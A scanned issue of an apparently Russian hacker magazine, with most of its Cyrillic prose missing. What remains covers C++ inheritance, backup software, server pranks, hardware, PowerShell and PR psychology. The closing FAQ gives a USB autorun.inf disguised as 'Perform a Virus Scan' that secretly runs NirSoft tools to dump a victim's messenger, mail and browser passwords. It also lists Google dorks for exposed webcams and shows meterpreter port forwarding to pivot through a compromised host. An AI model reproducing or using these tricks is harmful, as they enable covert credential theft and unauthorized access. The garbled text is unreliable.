IE. WM_CLOSE,
.
, test_url:
import win32gui
import win32con
from pywinauto import application
def test_url(url):
X 05 /136/ 10

-
. , -
.
IE,
. , , .
, IE Reset IE, -
, . ,
: , IE . :).

,
IE - .
, :
,
, ;
,
( !) .
, IE , .
InPrivate Browsing -,
(- ,
.),
-. z

109

CODING
deeonis deeonis@gmail.com

C++

++ -
,
.
,

.
, C++
.
, ,
.
. -
: , , .

, ,
,
C++.


. ,
D (derived, ),
B (base, ). ,
,
D B,
. , B D, D
, B. ,
,
B,
D, D B.
, D,
B , D
B, .
.

110

. ,
,
.
-
class Person {...};
class Student: public Person {...};
void
//
void
//

eat (const Person &p);



study (const Student &s);

Person p;
Student s;
eat(p);
// , p
eat(s);
// , s ,
//
study(s);
//
study(p);
// ! p

.
,
,
,

- ,
.


, .
:
. . C++
:

class Bird {
public:
virtual void fly();
//

};
//
class Penguin: public Bird {

};

.
, ,
.
.
, .
.

class Bird {
public:

// - fly
X 05 /136/ 10

};
class FlyingBird: public Bird {
public:
virtual void fly();

};
class Penguin: public Bird {

// - fly
};


, , , .
, . fly() ,
.

void error(const std::string& msg);
class Penguin: public Bird {
virtual void fly()
{ error( !); }

};

, : ,
.
.
, ,
.
:


. :

//
int x;
void someFunc()
{
//
double x;
std::cin >> x;
}

, x , ,
.
x someFunc, , - . , .
x double.
.
.

class Base {
private:
int x;
public:
virtual void mf1() = 0;
virtual void mf1(int);


class Bird {
public:

virtual void mf2();


void mf3();
void mf3(double);

// - fly

};

};

class Penguin: public Bird {

// - fly
};

class Derived: public Base {


public:
virtual void mf1()
void mf3();
void mf4();

};

Penguin p;
p.fly();

// !

fly() ,
. , .
, ( ) ,
.
.
,
, , ,
. C++
- , .
X 05 /136/ 10

Derived d;
int x;

d.mf1();
// , Derived::mf1
d.mf1(x);
// ! Derived::mf1 Base::mf1
d.mf2();
// , Base::mf2

111

CODING

d.mf3();
// , Derived::mf3
d.mf3(x);
// ! Derived::mf3
Base::mf3

, mf3,
, , .
C++-.

, mf1 mf3
.
, Base::mf1 Base::mf3
Derived. ,
, , .
, ,
. ,

. using:
using-
class Base {
private:
int x;
public:
virtual void mf1() = 0;
virtual void mf1(int);
virtual void mf2();
void mf3();
void mf3(double);

};
class Derived: public Base {
public:
// ()
// mf1 mf3 Base Derived
using Base::mf1;
using Base::mf3;
virtual void mf1()
void mf3();
void mf4();

};
Derived d;
int x;

d.mf1();
d.mf1(x);

// , Derived::mf1
// , Base::mf1

d.mf2();

// , Base::mf2

d.mf3();
d.mf3(x);

// , Derived::mf3
// , Base::mf3

, . ,

112

,
using- , .

:
.

.
, ,
, ,
( , ) .
,
.
.

class Shape {
public:
virtual void draw() const = 0;
virtual void error();
int objectID() const;
};
class Rectangle: public Shape {};
class Ellipse: public Shape {};

, : ,
. .
,
, ,
.
, .
draw() . ,

.
Shape
draw
.
, ,
,
:
, .
.
error(), .
,
, .

, .
Shape .
(Triangle).

-. - ,
,
.
Triangle
class Shape {
public:
...
virtual void error();
X 05 /136/ 10

...
};
class Triangle: public Shape {
// ,
virtual void error();
};
Shape *tr = new Triangle;
// Shape::error(),
tr->error();

, -
,
.
.
, error ,
-.
:

class Shape {
public:
virtual void error();

protected:
void defaultError();
};
void Shape::defaultError()
{
// ,
}
class Rectangle: public Shape {
public:
virtual void error() {defaultError();}

};
class Ellipse: public Shape {
public:
virtual void error() {defaultError();}

};
class Triangle: public Shape {
public:
virtual void error();

};
void Triangle::error()
{
// ,
Triangle
}


, , .
, ,
. .
X 05 /136/ 10

C++ ,
,
.
. 2
class Shape {
public:
virtual void error() = 0;

};
//
void Shape::error()
{
// ,
}
class Rectangle: public Shape {
public:
virtual void error() {Shape::error();}
...
};
class Ellipse: public Shape {
public:
virtual void error() {Shape::error();}
...
};
class Triangle: public Shape {
public:
virtual void error();
...
};
void Triangle::error()
{
// ,
Triangle
}

, -
error,
. ,
, , error defaultError,
.
, objectID().
, , .
Shape ,
, Shape::objectID,
.
,
, , : ,
.

C++. , ,
,
- C++,
, . z

113

SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru




. , ,
:
(, , Windows), , , .
, .
BACULA
: Bacula
: bacula.org, sf.net/projects/
bacula
: Bacula
Project 5. Bacula System
Enterprise 4.
: GNU GPL
: Linux, FreeBSD, Open/Solaris
: Linux, *BSD, Open/Solaris, Mac
OS X, Win

, .
- ,
Bacula
,
, .
.

,
. ,

(, , ). Bacula ,
,
.

114


, .

,
.
.
,
Bacula, ,
, /
:
Director ( 9101) ,
Bacula, ,
;
Storage ( 9103) ,

( , CD/DVD,
USB );
File Daemon ( 9102) ,
Director'
Storage.
, Direct, Storage, File Daemon
Bacula
Monitor
( ) .
PostgreSQL, MySQL

SQLite. Director Storage


Linux,
FreeBSD, Open/Solaris. ,
, Windows
(32 64 bit), *BSD, Mac OS X. , Bacula
.
,
SSH ,
.
.
bconsole, BAT (Bacula Admin Tool) Qt ( Ubuntu universe) wx-console
wxWidgets. (baculagui) : bweb (- Perl
), bacula-web
(-, PHP), bimagemgr
(- CD ). ,
, Baculaconf
(baculaconf.sf.net) Webacula (Web + Bacula,
webacula.sf.net/ru).
, -,
(, ..),
,
.
Bacula
( CRAM-MD5), X 05 /136/ 10

TLS .
iptables 192.168.1.0/24 :
:
-A INPUT -p tcp --dport 9101:9103 s 192.168.1.0/24 -j
ACCEPT

9102 :
-A INPUT -p tcp --dport 9102 s 192.168.1.0/24 -j ACCEPT

, Bacula, Bran (branbackup.org,


ALT Linux),
. -.

BACKUPPC
: BackupPC
: backuppc.sf.net
: GNU GPL
: Linux, *BSD, Open/Solaris
:
BackupPC . Bacula, ,
.
, .
Unix- Linux, *BSD, Open/Solaris. Unix/Linux, Mac
OS X Windows . Windows SMB,
X 05 /136/ 10

rsync ( cygwin), Unix-


rsync, nfs tar.
BackupPC ,
:
SMB, , ,
,
rsync. (gzip/bzip2),
. , .
SSH .
, IP-.
, , .
.
,
. ,
IP,
.
BackupPC ,
.
, .
. , .
. ,
AMANDA.
config.pl (
, ).

115

SYN/ACK

Boxi

- Bacula Webacula
( /ServerBackupPC/
pc/computer_name).

hosts.
, ,
, ,
- (CGI),
-.
,

. -
, .
BackupPC Perl,
:
Compress::Zlib, Archive::Zip File::RsyncP.
, Samba
Apache.
3.1.0
( 2007 ), 3.2.0beta0 ( 2009),
.

BOX BACKUP
: Box Backup
: boxbackup.org

: BSD
: Linux, *BSD, Open/Solaris, Mac
OS X
: Linux, *BSD, Open/Solaris, Mac
OS X, WinXP/2k3/Vista
Box
Backup ,
. ,
,

, , CD/DVD .

.
,

. ,
.
(snapshot),

(rsync).
, Box Backup , ,
.
, - (
)
. , Box Backup

vs

,
. .
.
.
, ,
, ( ).
.

116

.
, .

, . ,
MP3 ,
:
ExcludeFilesRegex = .*\.(mp3|MP3)$

Box Backup -
: bbstored, ,
bbackupd,

, bbackupquery,

. ,
, ,

,
.

OpenBSD Linux, Box Backup
Free/NetBSD, Mac OS X, Solaris.
, ,
Windows.
Box Backup
.
TLS/
SSL . , bbstored-certs,
.

AES, Blowfish,
, , .
, (
, ) .
,
,
, .
,

X 05 /136/ 10

- BackupPC
. Boxi (boxi.sf.net),

wxWidgets.
.

Windows. - Boxbackup-Explorer (joonis.de/boxbackup-explorer),

.
0.10 (
2006 ), . : 2 .
, 0.11rc5 ( 2009),
,
.

AMANDA
: AMANDA
: amanda.org, sf.net/projects/amanda
: Freeware
: Linux, *BSD, Open/Solaris, Mac OS X
: Linux, *BSD, Open/Solaris, Mac OS X,
WinXPSP2/2k3SP2/VistaSP1/2k8R2/7
AMANDA (Advanced Maryland Automatic Network Disk
Archiver) ,
Maryland
().
Sourceforge, freeware
, , ,
.
AMANDA
, *nix- .
, AMANDA
dump/restore ( XFS xfsdump), GNU tar,
compress, gzip ,
.
AMANDA , CD/
DVD -.
, ,
.
AMANDA dump tar.
ext2/3, ZFS XFS ,
,
X 05 /136/ 10

BackupPC Web-
CGI,

INFO
tar, ,

.
AMANDA - .
,
,
, .
, Windows SMB.
Zmanda Windows Client 2.6.x (wiki.
zmanda.com/index.php/Zmanda_Windows_Client), Win32 API
Volume Shadow Services
( VSS ][ 2008
).
: WinXPSP2/2k3SP2/VistaSP1/2k8R2 Se7en.
- (cs.ait.ac.th/laboratory/amanda),
Windows
.

,
UDP TCP.
:
Kerberos 4/5, OpenSSH, rsh, bsdtcp, bsdudp Samba. , Windows
bsdtcp.
"-auth=bsdtcp". , inetd:
amanda stream tcp nowait amanda /usr/lib/
amanda/amandad amandad -auth=bsdtcp amdump

, disklist, , ,
:
auth "bsdtcp"

, .
10080/UDP 10081/
TCP, Kerberos.
.

info
VSS
,
][
03.2008.

HTTP://WWW
links
Bacula
bacula.org, sf.net/
projects/bacula

Webacula webacula.
sf.net/ru

BackupPC
backuppc.sf.net

BoxBackup
boxbackup.org
Boxi
boxi.sf.net

AMANDA amanda.
org, sf.net/projects/
amanda
Zmanda
Windows Client
wiki.zmanda.com/
index.php/Zmanda_
Windows_Client

117

SYN/ACK

Bacula - BAT
AMANDA . , ,

.
GPG, , , , (amcrypt, GPG
..) .
:

Bacula Ubuntu

kencrypt yes

, .
,
.
cron .
,
. , . ,
AMANDA
. , ,
. Amanda Enterprise Edition
GUI (Zmanda Management Console),
.

118

AMANDA ,
amrecover, , , ,
: ,
, , . ,
.

,
,
. ,
,
.
, ,
.z
X 05 /136/ 10

8.5

DVD

!
660 . !
? ?
.
.
( )




.

2100 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru

1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

SYN/ACK
j1m@synack.ru


, ,
, , , ,
,
, ,
.


:
1. .
-,
,
.
,

, .
2. -.
,

. ,
.
, , . :
, ,
.
3. .

. , -,
,
, ,

( ).
,

,
.

120


, , ,

.
.
, ,
,
.
,
, , : ftpd, smtpd
httpd, dns. ,

, ProFTPd, ,
, vsftpd,

:
ProFTPd. /etc/proftpd.conf "Welcome to Micro-FTPd
0.23 (OS/2 3.3)" ServerName.
vsftpd. /etc/
vsftpd/vsftpd.conf
: "ftpd_
banner=Welcome to OnixFTPD (version:
22.1, OS: 386BSD 4.3)".
LigHTTPd. /etc/
lighttpd.conf
server.tag "MicrosoftIIS/3.3.3.3.3".

Sendmail. /etc/
mail/sendmail.mc
:
define(`confSMTP_LOGIN_MSG,
`exchange.srv.local Microsoft MAIL
Service, Version: 6.0.3790.1830
ready)dnl
:
# cd /etc/mail
# m4 sendmail.mc > sendmail.cf
* Postfix. /etc/postfix/
main.cf, smtpf_banner
"VAX
HTTPD 3.31-beta (MS-DOS 5.3, gcc
1.1)"
* Bind. /etc/bind/named.conf,
:
options {
version "8.2.2";
};

: BIND 8.2.2
, ,

DNS-, DoS-
root.
.

, ,
Apache
X 05 /136/ 10

include/ap_release.h (
#define AP_SERVER_BASEPRODUCT "Apache").
, , .
honeypot-, .
smtp-, , :
$ vi fake-smtpd.pl
#!/usr/bin/perl
use Socket;
$port=25;
$hostname="host.com";
$banner="220 host.com ESMTP Sendmail 8.6.1/8.5.0\n\r";
$fail="500 Command unrecognized:";
[ skipped ]
($af,$port,$inetaddr)=unpack($sockaddr,$addr);
@inetaddr=unpack('C4',$inetaddr);
($i1,$i2,$i3,$i4)=@inetaddr;
$ipaddr="$i1.$i2.$i3.$i4";
print "connected from $ipaddr\n";
print NS $banner;
while(<NS>) {
if (/EHLO/i) {
print NS "Hello $ipaddr. nice to meet you\n\r";
} else {
print NS "$fail $_\r";
print "tried $_";
}
}
print "$ipaddr disconnected\n";
}
X 05 /136/ 10

, ,
, . ,
, .
, ,

-? ,
.
( HTTPd),
,
. Nmap : ,
,
(TCP UDP, ..) , .
, , :
# iptables -P INPUT DROP
# iptables -A PREROUTING -t nat -p tcp ! --dport 80 \
-j REDIRECT --to-port 80
# iptables -A INPUT -p tcp --syn --dport 80 \
-m connlimit ! --connlimit-above 10 -j ACCEPT

, 80, 80- . 10. , web-


DoS.
web- -
. ,
slashdot- ( - ),
, web-.

121

SYN/ACK

SMTP- SMTP

Apache
( ), .
,
.
.htaccess
:
RewriteEngine on
RewriteCond %{HTTP_REFERER}
^http://www\.evil\.net [NC]
RewriteRule .* http://www.google.
com [R]


HTTP_REFERER
,
www.evil.net ([NC]
no case: URL
).
,
,
( google.com,
).
, .
Wi-Fi
,

, Wi-Fi ,
.
: ,
/
, - . ,
, ,
.
www.ex-parrot.com/pete/
upside-down-ternet.html,

122

. : ,
,

, .
, .
DHCP-,
.
,
.
dhcpd.
conf:
# vi /etc/dhcpd.conf
###
ddns-updates off;
ddns-update-style interim;
authoritative;
shared-network local {
### ""
subnet *.*.*.* netmask
255.255.255.0 {
range *.*.*.* *.*.*.*;
option routers *.*.*.*;
option subnet-mask
255.255.255.0;
option domain-name "mydomain.
ru";
option domain-name-servers
*.*.*.*;
deny unknown-clients;
###
host client1 {
### MAC-
IP-
hardware ethernet
*:*:*:*:*:*;
fixed-address *.*.*.*;
}
}

### , , , ,
### -
subnet 192.168.0.0 netmask
255.255.255.0 {
range 192.168.0.2
192.168.0.10;
option routers 192.168.0.1;
option subnet-mask
255.255.255.0;
option domain-name-servers
192.168.0.1;
allow unknown-clients;
}
}

dhcpd:
$ sudo service dhcpd restart

squid,
HTTP-,
:
$ sudo apt-get install squid

/etc/
squid/squid.conf ( ):
# vi /etc/squid/squid.conf
###

acl localnet src 192.168.0.0/24
http_access allow localnet
###
http_port 3128 transparent
###
url_rewrite_program /usr/local/bin/
flip.pl

flip.pl, :
# vi /usr/local/bin/flip.pl
#!/usr/bin/perl
$|=1;
$count = 0;
X 05 /136/ 10

flip.pl

xakep.ru -, , google.com


):

$pid = $$;
while (<>) {
chomp $_;
if ($_ =~ /(.*\.jpg)/i) {
$url = $1;
system("/usr/bin/wget", "-q", "-O","/
var/www/images/$pid-$count.jpg", "$url");
system("/usr/bin/mogrify", "-flip","/
var/www/images/$pid-$count.jpg");
print "http://127.0.0.1/images/$pid-$count.jpg\n";
}
elsif ($_ =~ /(.*\.gif)/i) {
$url = $1;
system("/usr/bin/wget", "-q", "-O","/
var/www/images/$pid-$count.gif", "$url");
system("/usr/bin/mogrify", "-flip","/
var/www/images/$pid-$count.gif");
print "http://127.0.0.1/images/$pid$count.gif\n";
}
else {
print "$_\n";;
}
$count++;
}

:
$ sudo chmod +x /usr/local/bin/flip.pl

squid :
$ sudo service squid reload

-, , :

$ sudo usermod -aG proxy www-data

INFO

-:
$ sudo service apache2 restart

, iptables:
$ sudo iptables -t nat -A POSTROUTING \
-j MASQUERADE
$ sudo iptables -t nat -A PREROUTING -p tcp \
--dport 80 -j REDIRECT --to-port 3128

. HTTP-,
, squid
, , -,
/var/www/images
-. ,
- -.


. ,
.
, .
Postfix, ,
,
,
. filter,
:

info

,

bash

.

!
(][_11_2009),

.

DVD
dvd



fake-smtpd.pl
flip.pl.

$ sudo adduser filter


$ sudo apt-get install apache2

:
$ sudo mkdir /var/www/images
$ sudo chown www-data:www-data /var/www/images
$ sudo chmod 755 /var/www/images

- ,
www-data proxy (
X 05 /136/ 10

, :
$ sudo mkdir /var/spool/filter
$ sudo chown filter:filter /var/spool/filter

.
/etc/
postfix/master.cf.

123

SYN/ACK

BIND

filter unix - n n - 10 pipe flags=Rq user=filter argv=/


usr/local/bin/mail-filter.sh

$ sudo chmod +x /usr/local/bin/mail-filter.sh

:
mail-filter.sh :
$ sudo service postfix reload
# vi /usr/local/bin/mail-filter.sh
#!/bin/sh
###
INSPECT_DIR=/var/spool/filter
SENDMAIL="/usr/sbin/sendmail -i"
###
EX_TEMPFAIL=75
EX_UNAVAILABLE=69
###
trap "rm -f in.$$" 0 1 2 3 15
###
cd $INSPECT_DIR || exit $EX_TEMPFAIL;
###
cat > in.$$ || exit $EX_TEMPFAIL;
###
echo "---\n ..." > in.$$
### sendmail'
$SENDMAIL "$@" < in.$$
exit $?

124

smtpd
pipe (
). echo
( ...)
sendmail. (postfix - postfix).
,
IP- DNS-,
,
- www.bibigon.com.
google.com,
html-, -
80-
-, google.
com .
Samba CUPS,
, .

, , .
, . ,
. z
X 05 /136/ 10

SYN/ACK
Nathan Binkert nat@synack.ru


CyberBook S855:
DESTEN
> :
Intel
965GM
Intel
ICH8M
> :
2 SODIMM
DDR2
800/667 SDRAM
4
> :
2.5" SATA HDD,
80-320
> :
15.4" WXGA (1280x800)

>> SYN/ACK


CyberBook S855

> :
Intel Graphics Media Accelerator GMA X3100
( 358 )

> ( ):
Intel Core 2 Duo 2.1-2.8 FSB 800 , 3-6

Intel Celeron M 1.73-2.26 FSB 533 , 1

> :
56K V.90 -
10/100/1000 /
Intel Pro
Wireless 4965AGN (802.11a/g)
Bluetooth 2.0, 3G ()

.
, , , , , , ,
. .
DESTEN CyberBook,

, . , , , , ,
.
S855 .

,
, .
,
.
,
- . , ,
.
,
, . .
CyberBook -

126

> :
- 6-
4400 / ( 3 )
- 9-
6600 / ( 4 )
> -:
3 USB 2.0
1 IEEE 1394 (4-pin)
1 Express Card 34/54
1 VGA (15-pin D-sub)
1
1
1 RJ-11 (56 Kbps V.90)
1 RJ-45 Ethernet
1 COM port (9-pin D-sub)
> :
- 4 1 (SD, MMC, MS, MS Pro)
- 1.3
88
Intel HD Audio

DVD+-RW (
)
> :
370 x 276 x 37,5~40
: 3

MIL-STD 810F.
MIL-STD-810F, 516.5,
IV. MIL-STD-810F 514.5, I.
,
IT- .
Intel Core 2 Duo,
4 ,
320 . : Ethernet-, v.92,
Wi-Fi 3G-.
40286 .
X 05 /136/ 10

ipc2U iROBO-1000-10A2:
Intel Atom

ipc2U iROBO-1000-10A2
> :
Mini-iTX
> :
Intel Atom 1.6
> :
Intel 945GSE
> :
DDR2 SODIMM
512
2 DDR2 533
> :
2 SATA-
1 160 SATA

2 RS-232
6 USB 2.0
1 CompactFlash
> :
VGA ( DVI, VGA)

Slim DVD-RW
> :


> :
( 1U)
(xx): 483 x 43 x 220
5.5

> :
2 Gigabit Ethernet-
> :
180

>> SYN/ACK

> :
1 PCI
-:
2 PS/2

iROBO-1000-10A2 ipc2U .
,

. Intel Atom.
iROBO Intel,
,
. -,
Intel Atom SCH
, ,
( 2.5 ),
. -,
,
X 05 /136/ 10

, , 220 ,

. -, Intel Atom , , .
, Intel Atom

. , 1.6 Intel Atom
800 Intel
Xeon, .

SATA-, 2 1.5 ( ,
DVD-

ROM). ,
, , -, .

,
, USB
.
, PCI.
-
Windows (Vista, XP Pro),
. iROBO-1000-10A2
RoHS.
512 160 700$.

127

SYN/ACK
grinder grinder@synack.ru

POWERSHELL 2.0
PowerShell , ,
, . : , .
, PS ,
, .


,
, .
,
. , "System.
OutOfMemoryException".

, ,
, .

. ,
, .

:
PS> Get-Process | Where ($_.
ProcessName -eq "explorer")
PS> Get-Process explorer

, .


.
,
PowerShell. ,
.
ForEach-Object ( foreach) -

128

foreach (
). ,

,
.
PS> $computers = Get-ADComputer
PS> foreach ($computer in
$computers) { - }


:
PS> Get-ADComputer | ForEach-Object
{ - }


, .
(pipelines, "|")
ForEach-Object

,
, . , .
ActiveDirectory
:
PS> import-module ActiveDirectory

,
:
PS> foreach ($computer in GetADComputer) { $computer }


,
( ) .

,
. . , foreach ,
PS
, foreach
.
, foreach ,
, , ,
. , -,
. ,
( ,
Get-Process, , ),
. PS
: .
TeeObject. , ,
:
PS> Get-Process | Tee-Object
-filepath C:\process.txt

,
.

:
X 05 /136/ 10

PS> Get-Process | Tee-Object -filepath C:\process.txt |


Sort-Object cpu

, Out-File:
PS> Get-Process | Tee-Object -filepath C:\process.txt |
Sort-Object cpu | Out-File C:\process-sort.txt

Tee-Object ,
"-inputObject".


GetContent, Select-String, . ,
, . ,
Get-Content ,
( ). ,
100 :

Get-Content , . , Select-String
, .
, PS
PowerShell:
PS> Select-String -path *.ps1 -pattern "PowerShell"

, , :
PS> Get-Content -path *.ps1 | where {$_ -match
"PowerShell"}


where, ,
. , , .
, , , (Warning, Failed ..), Success.
Select-String "notMatch"
, :

PS> Get-Content :\system.log -Read 100


PS> Select-String "Success" *.log notMatch

,
.
Read, , "| ForEach-Object
($_) |", .
, :
PS> Get-Content biglogfile.log -read 1000 | ForEachObject {$_} | Where {$_ -like '*x*'}

3 , :
PS> Get-Content biglogfile.log | Where {$_ -like '*x*'}
X 05 /136/ 10

, "context",
. ,
Failed:
PS> Select-String "Failed" *.log -content 2

, Select-String
, "-caseSensitive".
,

129

SYN/ACK

PS
,

PS ServerMnager

: , .
PS , .
Write-Host, : (-Backgroundcolor) (-Foregroundcolor).
PS> Get-Process | Write-Host -foregroundcolor DarkGreen -backgroundcolor white
. , Write-Host .
, Error,
.
PS> if ($a = "Error"){Write-Host $a -foregroundcolor red}
> else
> {Write-Host $a}
>}
, , " ": Write-Warning Write-Error.
PS> Write-Error "Access denied"
,
, , Out-Host
"-paging" :
PS> Get-Process | Out-Host -paging
: Clear-Host ( ), WriteProgress ( ), Sort-Object ( ).
PS> Get-Process | Sort-Object cpu
, CPU, .
"-Descending".

130

Microsoft, SelectString
grep/egrep. , grep
Windows :
GnuWin32 (gnuwin32.sf.net), Windows grep
(wingrep.com), GNU Grep For Windows (steve.
org.uk/Software/grep), Grep For
Windows (grepforwindows.com, pages.interlog.
com/~tcharron/grep.html) .
grep Select-String.
> grep Warning *.log



,
, .Net.
, grep. ,
Windows findstr.exe, ,
, grep .

. PS
, ,
-,
( GetType().
FullName), . ,
.

. ,

,
. ,
,
,
:
PS> $arr = New-Object string[] 300

:
PS> $arr.GetType().Basetype

:
X 05 /136/ 10

INFO

info

Get
EvenLog
$arr = new-object int[] 1000
for ($i=0; $i lt 1000; $i++)
{$arr[$i] = $i*2}

10 , :
$arr = @()
for ($i=0; $i lt 1000; $i++)
{$arr += $i*2}


PS Perl-
,
. , PS


. PS
*-Eventlog ,
, .
. ,

, "Nevest"
:

,
.NET Framework ( System.Text.
RegularExpressions.Regex). "-match" "cmatch"
(case-sensitive, ) "-imatch" (case
insensitive, ). ,
IP-,
ipconfig. :
PS> ipconfig | where {$_ -match "\d{3,}"}

PS
,
*, ?, +, \w, \s, \d .
:

Windows

PS v2.0 CTP3 Get-WinEvent,


.
, :
PS> Get-WinEvent -ListProvider *update*
Microsoft-Windows-WindowsUpdateClient {System,
Operational}

localhost, synack.ru

, :


PowerShell
][_03_2010.

(
<Tab>),
.

PS> $regex = "^[a-z]+\.[a-z]+@synack.ru$"


> If ($email notmatch $regex) {

Microsoft-Windows-WindowsUpdateClient/
PS> Get-Eventlog Security -Nevest 20 -computername


PowerShell
PowerShell

2009 .

, ,
Windows Update.
:

PS> Get-Eventlog Security -Message "*failed*"

HTTP://WWW
links

, PowerShell
microsoft.com/
powershell, blogs.
msdn.com/PowerShell

powershellcommunity.
org, pwrshell.net,
powershelltools.com,
powershell.wik.is.
Unix
Windows
gnuwin32.sf.net

PS> $provider = Get-WinEvent -ListProvider

(
EventID=4624):
PS> Get-Eventlog Security | Where-Object {$_.
EventID -eq 4624}
X 05 /136/ 10

Microsoft-Windows-WindowsUpdateClient
PS> $provider.events | ? {$_.description -match
"success"} | select id,description | ft -AutoSize


Perl.
www.xakep.ru/
post/19474

131

SYN/ACK


, "Warning",
"!!!Warning":
PS> Get-Content -path system.log | foreach {$_ -replace
"Warning", "!!!Warning"}

,
. Perl,
,
. $0 , $1 , $2 .
:
PS> Get-Content -path system.log | foreach {$_ -replace
"(Warning)", "!!!$0"}

Where PowerShell
> Write-Error "Invalid e-mail address $email"
>}

, synack.ru
( ), ( Write-Error - ).
,
, (. Perl www.xakep.ru/post/19474). ,
,
.
, RegexBuddy (regexbuddy.com/powershell.html)
RegexMagic (regexmagic.com). , PS
, -replace (
-ireplace -creplace).
:
-replace "_","_"

132

-
, , . Microsoft
, PS Measure-Command,
.
PS CMD, COM, WMI .NET,
. .
:
PS> Measure-Command {ServerManagerCmd -query}
TotalMilliseconds: 7912,7428
PS> Measure-Command {Get-WindowsFeature}
TotalMilliseconds: 1248,9875

, PS
.

PowerShell ,
, .
. ,
. z
X 05 /136/ 10

UNITS

Oriyana oriyana@xaker.ru

PSYCHO:

PR-

,
. , , , . ,
, . , ,
. , .

, ,

. , , ,
,
, PR-.
PR
. ,
, ,
,
, , , ,
, PR?
Public Relations ( )
, ,

. :
, , .
,
, ,
.
PR-. , ,

134


,
.

, . : ,
,
,
.

, ,
, .
,
,
, .
PR- ,
, .
.

: ,

. ,
, .
,
,
.

.
:
, ,
,
.
.
: , ,
, .

. .
.
, .
-
. ? :

, .
:
, X 05 /136/ 10

. ?
. ,
- ,

Boss
,
, , - .
-.
,
.

,
,
, .
: - ,
,
, ,
, . , , ,
, ,
.
:
.

, .

.
X 05 /136/ 10

,
,
.
: !
18:00! 30%!.
,
.

,
PR

:
, ,
, ,
.
.
, :
- ,

. , ., , , 5:43

.
. ,

,
. :
( ,
)
, .


,

. ,
,
. , ,
, ,
.

. ,
,

. , ,
.
, ,
,

.

135

UNITS

Pepsi

-.
,

, ,

. .
, ,
,
.
, ? :)
:
, .
, ,
. ,
, ,
.
. ,


.
: ,

, ,
,
. ,

, ,

136

,
, .

: , ()
(
). : , ,
. (
). ? ,

( , )? ( ,
).
,
,
. ,
, . ,
. .
:
.
, . , ,
, .

: ,
.
: . ,
, .
.
.
-
, , .
, ,
,
. , 2-3

( ) .
, .
.
,
.
: , ,
,
. , , , 70% (
,
), 30% . ,
, ,
.
: , ,
.
,
.
, ,
, .
:
.
,
:

.
:
, : , ,
,
.
,
:
,
.
, . ,

,
X 05 /136/ 10

: -
,
, .
,
.

.

H1N1
. .
?
.
.
: , , .
,


.
.


. ,
,

.
:

,
(, , ). -



: ( ). ( , , ,
, ) (,
, , , ) ,
,
.
, , , ,
,
, ,
.
, ,
, ( );
, (
,
,
);

, , , , ,
, ,

: ,
,
,

. , ,

.
.
, , , .
,
.
,
: X 05 /136/ 10

, , ,
,
.
:
. , , .
,
,
,

(
). , -

-,
.


(
, , ,
).
,
,
.
.

. : ,

, ,

137

UNITS

.
: ,

, . ,
?
()
, , .
(,
..)
,
. , ,
, ;
(, , ) (,
, ).
( , ). ,
,
.

. , : ,
, (
). ,

.
, : ,
,

( ).

.
.

2004

,
.
,
.
,
, ,
.
, .
, ,
.

138

X 05 /136/ 10

:
,
, , .
.
.
.
, , . odnoklassniki.ru vkontakte.
ru.

.
,
, .
. ,

. , , ,
-,
, -,
VPN .
, .
, :
, ,
,
, , .
.

PR


PR-

PR-


, PR-
.

.

,
,
.
. 2004 .
.
, .
X 05 /136/ 10

,
?
,
(
).
?
, ?
,
, , .

.
,
,
.
.

,
, ,
. .
:
( , );
,
, , (
, , );
, , , -
(,
);
, ,
;

;
, ,
.
, , ,
PSYCHO! :)z

139

UNITS
antitster@gmail.com

faq
united
@real.xakep.ru

Q: , .
- , . ?
A: .


, .
, ,
,
.

:
MessenPass (www.nirsoft.net/utils/mspass.
html)
: MSN Messenger,
Windows Messenger, Yahoo Messenger, ICQ,
Trillian, Miranda GAIM;
Mail PassView (www.nirsoft.net/utils/mailpv.
html)
: Outlook Express, Microsoft
Outlook 2000, Microsoft Outlook 2002/2003,
IncrediMail, Eudora, Netscape Mail, Mozilla
Thunderbird;

140

IE Passview (www.nirsoft.net/utils/internet_
explorer_password.html)
, Internet
Explorer-;
Protected Storage PassView (www.nirsoft.net/
utils/pspv.html) , ;
PasswordFox (www.nirsoft.net/utils/
passwordfox.html) ,
Firefox'.
,
, .
autorun.inf :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

launch.bat:
start
start
start
start

mspass.exe /stext mspass.txt


mailpv.exe /stext mailpv.txt
iepv.exe /stext iepv.txt
pspv.exe /stext pspv.txt

start passwordfox.exe /stext


passwordfox.txt


popup "ACTION= Perform a Virus Scan",

,
.
Q: -,
?
A: Googlehack
! (www.xakep.ru/magazine/
xa/076/056/1.asp)
:

inurl:"CgiStart?page="
inurl:/view.shtml
intitle:"Live View / AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
X 05 /136/ 10

(disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera
NetworkCamera" (disconnected)
intitle:axis intitle:"video
server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.
html"
intitle:"Live NetSnap Cam-Server
feed"
intitle:"Live View / AXIS"
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motio
n" (disconnected)
intitle:start inurl:cgistart
intitle:"sony network camera
site:.viewnetcam.com -www.
viewnetcam.com
intitle:"Toshiba Network Camera"
user login
intitle:"netcam live image"
(disconnected)
intitle:"i-Catcher Console Web
Monitor"

Q: -

1. meterpreter OpenSSH . ,
: packetheader.
blogspot.com/2009/01/installing-openssh-onwindows-via.html.
2. OpenSSH
Meterpreter,
8000
22
:
meterpreter> portfwd add -L
172.16.186.132 -l 8000 -r
172.16.186.128 -p 22

3. SSH-
(172.16.186.132):
# ssh -D 127.0.0.1:9000 -p 8000
username@172.16.186.132

SOCKS4-
9000 ,
SSH-.
4. PROXYCHAINS ,
nessusd SOCKS4-, 9000 (
proxychains.conf
,
):

?
A:

,
,
,
,
. ,
- ,
,
.

,
GhostBuster (ghostbuster.
codeplex.com). !
Q: .
,
(
HTTP/HTTPS-).
(172.16.186.132). meterpreter- (172.16.186.126)
